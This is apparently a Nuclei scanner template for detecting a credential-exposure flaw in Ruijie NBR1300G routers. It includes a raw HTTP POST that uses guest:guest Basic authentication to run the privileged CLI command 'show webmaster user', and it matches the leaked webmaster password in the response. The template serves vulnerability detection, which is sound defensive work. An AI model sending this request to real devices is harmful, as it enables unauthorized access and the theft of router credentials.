id: ruijie-nbr1300g-exposure info: name: Ruijie NBR1300G Cli Password Leak - Detect author: pikpikcu severity: high description: Ruijie NBR1300G CLI password leak vulnerability was detected. reference: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 tags: ruijie,exposure requests: - raw: - | POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. matchers-condition: and matchers: - type: word words: - "webmaster level 2 username guest password guest" part: body - type: status status: - 200 # Enhanced by md on 2023/02/23